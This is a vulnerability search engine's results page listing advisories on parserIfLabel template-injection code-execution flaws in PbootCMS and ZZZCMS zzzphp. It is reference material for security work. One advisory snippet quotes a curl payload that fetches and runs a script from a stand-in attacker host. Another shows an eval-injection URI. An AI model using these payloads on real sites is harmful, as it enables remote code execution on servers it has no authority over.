CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

21 matches found

RedhatCVE•added 2026/01/09 12:19 p.m.•3 views

CVE-2018-10133

PbootCMS v0.9.8 allows PHP code injection via an IF label in index.php/About/6.html or admin.php/Site/index.html, related to the parserIfLabel function in \apps\home\controller\ParserController.php...

9.8CVSS7.5AI score0.00397EPSS

Exploits1References1

EUVD•added 2025/10/07 12:30 a.m.•3 views

EUVD-2019-7809

Malware in sbrugna...

9.8CVSS9.2AI score0.01969EPSS

Exploits1References2

RedhatCVE•added 2025/05/22 10:57 p.m.•6 views

CVE-2022-32417

PbootCMS v3.1.2 was discovered to contain a remote code execution RCE vulnerability via the function parserIfLabel at function.php...

9.8CVSS8.3AI score0.42668EPSS

Exploits1References1

RedhatCVE•added 2025/05/22 3:34 a.m.•4 views

CVE-2019-17408

parserIfLabel in inc/zzztemplate.php in ZZZCMS zzzphp 1.7.3 allows remote attackers to execute arbitrary code because the dangerkey function can be bypassed via manipulations such as strtr...

9.8CVSS8.1AI score0.01969EPSS

Exploits1References1

OSV•added 2022/07/14 10:15 p.m.•0 views

CVE-2022-32417

PbootCMS v3.1.2 was discovered to contain a remote code execution RCE vulnerability via the function parserIfLabel at function.php...

9.8CVSS6.4AI score

Exploits0References1

ATTACKERKB•added 2022/07/14 10:15 p.m.•0 views

CVE-2022-32417

PbootCMS v3.1.2 was discovered to contain a remote code execution RCE vulnerability via the function parserIfLabel at function.php...

9.8CVSS8AI score0.42668EPSS

Exploits1References2

Prion•added 2022/07/14 10:15 p.m.•20 views

Remote code execution

PbootCMS v3.1.2 was discovered to contain a remote code execution RCE vulnerability via the function parserIfLabel at function.php...

7.5CVSS9.8AI score0.42668EPSS

Exploits1References1Affected Software1

Cvelist•added 2022/07/14 9:40 p.m.•13 views

CVE-2022-32417

PbootCMS v3.1.2 was discovered to contain a remote code execution RCE vulnerability via the function parserIfLabel at function.php...

10AI score0.42668EPSS

Exploits1References1

seebug.org•added 2021/05/13 12:0 a.m.•384 views

zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞（CVE-2021-32605）

curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...

7.5CVSS0.2AI score0.21913EPSS

Exploits3

CNVD•added 2019/10/15 12:0 a.m.•2 views

ZZZCMS zzzphp input validation error vulnerability (CNVD-2020-14279)

ZZZCMS zzzphp is a content management system CMS. An input validation error vulnerability exists in the 'parserIfLabel' function of the inc/zzztemplate.php file in ZZZCMS zzzphp version 1.7.3, which can be exploited by a remote attacker to bypass the 'danger key' function to execute arbitrary cod...

9.8CVSS7.5AI score0.01969EPSS

Exploits1References1

OSV•added 2019/10/14 12:15 p.m.•0 views

CVE-2019-17408

parserIfLabel in inc/zzztemplate.php in ZZZCMS zzzphp 1.7.3 allows remote attackers to execute arbitrary code because the dangerkey function can be bypassed via manipulations such as strtr...

9.8CVSS7.6AI score

Exploits0References1

Prion•added 2019/10/14 12:15 p.m.•8 views

Code injection

parserIfLabel in inc/zzztemplate.php in ZZZCMS zzzphp 1.7.3 allows remote attackers to execute arbitrary code because the dangerkey function can be bypassed via manipulations such as strtr...

7.5CVSS9.7AI score0.01969EPSS

Exploits1References1Affected Software1

CVE•added 2019/10/14 11:43 a.m.•46 views

CVE-2019-17408

Affected software: ZZZCMS zzzphp 1.7.3. The issue is in parserIfLabel within inc/zzz_template.php, where the danger_key function can be bypassed (e.g., via strtr), enabling remote attackers to execute arbitrary code. This is the explicit root cause and consequence stated across multiple sources. ...

9.8CVSS9.6AI score0.01969EPSS

Exploits1References1Affected Software1

Exploit DB•added 2019/02/25 12:0 a.m.•85 views

zzzphp CMS 1.6.1 - Remote Code Execution

Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1 Google Dork: intext:"2015-2019 zzcms.com" Date: 24/02/2019 Exploit Author: Yang Chenglong Vendor Homepage: http://www.zzzcms.com/index.html Software Link: http://115.29.55.18/zzzphp.zip Version: 1.6.1 Tested on: windows/Linux,iis/apache C...

7.2CVSS7.2AI score0.88162EPSS

Exploits8

Prion•added 2019/02/23 6:29 p.m.•18 views

Code injection

An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzztemplate.php file, the parserIfLabel function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring...

6.5CVSS7.1AI score0.88162EPSS

Exploits8References2Affected Software1

OSV•added 2019/02/23 6:29 p.m.•1 views

CVE-2019-9041

7.2CVSS7.1AI score0.88162EPSS

Exploits8References2

Cvelist•added 2019/02/23 6:0 p.m.•25 views

CVE-2019-9041

7.2AI score0.88162EPSS

Exploits8References2

Prion•added 2018/11/27 7:29 a.m.•17 views

Code injection

PbootCMS V1.3.1 build 2018-11-14 allows remote attackers to execute arbitrary code via use of "eval" with mixed case, as demonstrated by an index.php/list/5/?current=pboot:ifevAl$GETa1/pboot:if&a=phpinfo; URI, because of an incorrect apps\home\controller\ParserController.php parserIfLabel...

7.5CVSS9.8AI score0.04855EPSS

Exploits1References3Affected Software1

Prion•added 2018/04/16 3:29 p.m.•8 views

Code injection

7.5CVSS9.6AI score0.00397EPSS

Exploits1References1Affected Software1

OSV•added 2018/04/16 3:29 p.m.•2 views

CVE-2018-10133

9.8CVSS5.8AI score0.00397EPSS

Exploits1References1

Rows per page